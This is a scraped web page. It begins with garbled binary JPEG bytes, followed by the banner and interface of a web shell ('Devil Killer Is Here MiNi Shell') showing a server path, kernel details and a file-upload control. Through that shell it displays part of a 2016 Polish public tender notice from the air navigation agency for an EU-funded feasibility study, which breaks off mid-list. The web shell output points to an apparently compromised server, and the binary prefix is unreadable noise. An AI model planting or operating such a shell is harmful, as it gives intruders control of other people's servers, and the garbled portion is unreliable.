JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160819/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160819/301939-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 301939 - 2016
              z dnia 2016-08-19 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: Opracowanie studium wykonalności dla projektu pt.: Rozwój infrastruktury państwowego organu zarządzania ruchem lotniczym  Etap  II (POIiŚ 2014 2020)<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Rozwój infrastruktury państwowego organu zarządzania ruchem lotniczym w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020  współfinansowanego przez Unię Europejską ze środków Funduszu Spójności</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Polska Agencja Żeglugi Powietrznej, krajowy numer identyfikacyjny
              14088677100000, ul.
              ul. Wieżowa 
              8,
              02147  
              Warszawa, woj.
              mazowieckie, państwo
              , tel.
              22 574 62 44, e-mail
              , faks
              22 574 63 59.
              <br />
              Adres strony internetowej (URL): ww.pansa.pl<br /><br />
                Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne
                http://www.bip.pansa.pl/</div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa osoba prawna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.pansa.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.bip.pansa.pl/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Ofertę należy złożyć w budynku PAŻP, 05-090 Raszyn, ul. Gałczyńskiego 2a, pok. 004  Kancelaria  lub przesłać na ww. adres. <br />
                Adres:
                <br />Polska Agencja Żeglugi Powietrznej 05-090 Raszyn, ul. Gałczyńskiego 2a  pok. 004  Kancelaria</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Opracowanie studium wykonalności dla projektu pt.: Rozwój infrastruktury państwowego organu zarządzania ruchem lotniczym  Etap  II (POIiŚ 2014 2020)<br /><b>Numer referencyjny: </b>AQW-2227-23/54/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest przygotowanie dokumentacji aplikacyjnej dla projektu "Rozwój infrastruktury państwowego organu zarządzania ruchem lotniczym  etap II " realizowanego w ramach Programu Operacyjnego Infrastruktura i Środowisko 2014-2020  współfinansowanego przez Unię Europejską ze środków Funduszu Spójności,  w tym:
1.1	Koncepcji Studium Wykonalności dla Projektu;
1.2	Studium Wykonalności dla Projektu realizowanego przez Zamawiającego; 
1.3	Rezultatów Studium Wykonalności wraz z analizą kosztów i korzyści dokonaną na sporządzonym przez Wykonawcę modelu w zakresie finansowym;   
1.4	Prezentacji multimedialnej dla celów promocji Projektu z wynikami Studium Wykonalności; 
1.5	Analizy finansowej w arkuszu kalkulacyjnym z aktywnymi formułami oraz analizy wrażliwości i ryzyka;
1.6	Wniosku o dofinansowanie realizacji Projektu.
<br /><br /><b>II.5) Główny kod CPV: </b>71241000-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 24<br /></div><br /><b>II.9) Informacje dodatkowe: </b>1.	Umowa zostaje zawarta na okres 24 (dwudziestu czterech) miesięcy od daty podpisania Umowy przez obie Strony.
2.	Wykonawca zobowiązany będzie do wykonania i dostarczenia kompletnej Dokumentacji w terminie do 13 (trzynastu) tygodni od daty podpisania Umowy przez Strony.
3.	Terminy dostarczania poszczególnej Dokumentacji zostały określone w § 5 Istotnych Postanowień Umowy(IPU).
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z art. 22 ustawy spełniają warunek udziału w postępowaniu dotyczące sytuacji ekonomicznej lub finansowej tj. Wykonawca musi wykazać, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na podstawie przedstawienia w ofercie polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 400 000,00 PLN (słownie: czterysta tysięcy zł);<br />
                Informacje dodatkowe
                na potwierdzenie spełniania warunków udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej Wykonawca, którego oferta została oceniona najwyżej, obowiązany jest złożyć niżej wymienione dokumenty Kopię polisy, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 400 000 zł (słownie: czterysta tysięcy  złotych), ważną w terminie składania ofert<br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy zgodnie z art. 22 ustawy spełniają warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej tj.
Warunek nr 2 - dotyczący zdolności technicznej lub zawodowej Wykonawcy:
1.Wykonawca musi wykazać, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonywał co najmniej  trzy (3) studia wykonalności każde dla projektu inwestycyjnego o wartości powyżej 25 mln EUR .
UWAGA: W przypadku podania wartości projektu inwestycyjnego dla którego usługa była realizowana  w walucie innej niż EUR, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na EUR według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.
2.Wykonawca musi wykazać, iż osoby skierowane przez Wykonawcę do realizacji zamówienia i pełnienia określonych funkcji posiadają odpowiednie doświadczenie tj.:
2.1.	  Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Kierownik projektu posiada  doświadczenie w kierowaniu wykonaniem minimum trzech studiów wykonalności każde dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR tj. kierowała wykonaniem w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania min. trzech (3) studiów wykonalności każde dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR
2.2.	Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Zastępca Kierownika projektu ds. analiz finansowych posiada doświadczenie w wykonaniu co najmniej trzech (3) analiz finansowych z zastosowaniem metodologii wymaganej przez KE w zakresie analizy kosztów i korzyści oraz analizy finansowej każda dla infrastrukturalnego projektu inwestycyjnego o wartości powyżej 25 mln EUR, tj. w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania była autorem lub współautorem co najmniej trzech (3) analiz finansowych z zastosowaniem metodologii wymaganej przez KE w zakresie analizy kosztów i korzyści oraz analizy finansowej każda dla infrastrukturalnego projektu inwestycyjnego o wrtości powyżej 25 mln EUR,;
2.3.	Osoba skierowana przez Wykonawcę do realizacji zamówienia jako Zastępcę Kierownika ds. analiz środowiskowych posiada doświadczenie w wykonaniu co najmniej trzech (3) opracowań każde dla projektu przekraczającego 25 mln EUR: raportów oddziaływania na środowisko sporządzonych w ramach ocen oddziaływania przedsięwzięcia na środowisko lub prognoz oddziaływania na środowisko sporządzonych w ramach strategicznych ocen oddziaływania na środowisko tj. w okresie ostatnich trzech lat przed dniem wszczęcia postępowania była autorem lub współautorem co najmniej trzech (3) opracowań, każde dla projektu przekraczającego 25 mln EUR: raportów oddziaływania na środowisko sporządzonych w ramach ocen oddziaływania przedsięwzięcia na środowisko lub prognoz oddziaływania na środowisko sporządzonych w ramach strategicznych ocen oddziaływania na środowisko
; 

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Na potwierdzenie spełniania warunków udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej Wykonawcy ubiegający się o zamówienie zobowiązani są złożyć 
1.	Wykaz usług wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie  z podaniem przedmiotu usługi wartości projektu dla którego usługi te były realizowane, dat wykonania (od-do), podmiotów, na rzecz których usługi zostały wykonane (nazwa, adres i telefon)  1 egzemplarz, datowany i odpowiednio podpisany - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 4 do SIWZ.
UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.1. SIWZ zakresu usług koniecznych do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informacje o wykonanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie co najmniej trzech (3) studium  wykonalności każde dla projektu inwestycyjnego o wartości powyżej 25 mln EUR .
1.1.	Dowody potwierdzające należyte wykonanie usług uwzględnionych w wykazie, o którym mowa w pkt 2 ppkt 2.1 w SIWZ i pkt. 1 powyżej. Dowodami są:
a)	referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, z tym że w odniesieniu do nadal wykonywanych usług dokumenty te powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b)	inne dokumenty  jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać dokumentów, o których mowa w lit. a) powyżej.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego zostały wcześniej wykonane usługi wskazane w wykazie, o którym mowa w pkt 2 ppkt 2.1.SIWZ i pkt. 1 powyżej , Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt 2 ppkt 2.2.SIWZ tj. pkt. 1.1 ogłoszenia
2.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich, doświadczenia oraz informacją o podstawie do dysponowania tymi osobami - opracowany wg druku dołączonego do  specyfikacji - Załącznik nr 5 do SIWZ;
UWAGA: W związku z określeniem w rozdziale V pkt 2 ppkt 2.2 pppkt  2.2.2. SIWZ min. Wymagań w zakresie osób jakie muszą być skierowane przez Wykonawcę do realizacji zamówienia i wymaganego ich doświadczenia do wykazania spełniania warunku udziału w postępowaniu w zakresie zdolności zawodowej, Wykonawca obowiązany jest w ww. Wykazie podać również informację na temat osób jakie zostaną skierowane przez Wykonawcę do realizacji zamówienia tj.  Kierownika projektu; Zastępcy Kierownika projektu ds. analiz finansowych  oraz Zastępcy Kierownika ds. analiz środowiskowych, wraz z podaniem Imienia i Nazwiska osoby oraz posiadanego doświadczenia.
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.WYKAZ DOKUMENTÓW I OŚWIADCZEŃ na potwierdzenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 5 ustawy. Wykonawca, którego oferta została oceniona najwyżej, obowiązany jest złożyć niżej wymienione dokumenty,  składa:
1.1. Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokument, o którym mowa w pkt 4 ppkt. 4.1.1.,SIWZ w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt. 6 ustawy. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.2.	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
1.3.	Oświadczenie Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
1.4.	Oświadczenie Wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy;
1.5.	Oświadczenie Wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
Jeżeli Wykonawca powołuje się na oświadczenia lub dokumenty o których mowa powyżej , będące w posiadaniu Zamawiającego, potwierdzające  okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3, zaleca się wskazanie w ofercie informacji czy Zamawiający jest w posiadaniu oświadczeń lub dokumentów dotyczących Wykonawcy (z podaniem numeru i nazwy postępowania Zamawiającego, w którym powyższe dokumenty zostały złożone) lub wskazanie nazwy ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (ze wskazaniem adresu internetowego, wydającego urzędu lub organu, z dokładnymi danymi referencyjnymi dokumentacji).

1.6.	Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej  opracowane wg druku dołączonego do SIWZ  Załącznik nr 6 do SIWZ. 
Uwaga: Wykonawca zobowiązany jest do przekazania Zamawiającemu  Oświadczenia o przynależności lub braku przynależności do tej samej grupy kapitałowej  w terminie 3 dni od dnia  zamieszczenia przez Zamawiającego na stronie internetowej informacji, o których mowa w art. 86 ust. 5 ustawy.  
W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie składa każdy z wykonawców wspólnie ubiegających się o zamówienie.

2.	WYKONAWCA MAJĄCY SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RZECZYPOSPOLITEJ POLSKIEJ
2.1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa:  powyżej:
2.1.1.	w pkt. 1 ppkt 1.1.powyżj  składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy;
2.1.2.	w pkt 1.2.  1.4. powyżej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
